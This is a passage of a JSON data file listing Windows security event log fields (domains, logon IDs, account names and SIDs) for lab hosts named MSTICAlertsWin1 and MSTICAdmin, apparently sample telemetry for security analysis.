CAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\"],\"SubjectLogonId\":[\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\"],\"SubjectUserName\":[\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\"],\"SubjectUserSid\":[\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-99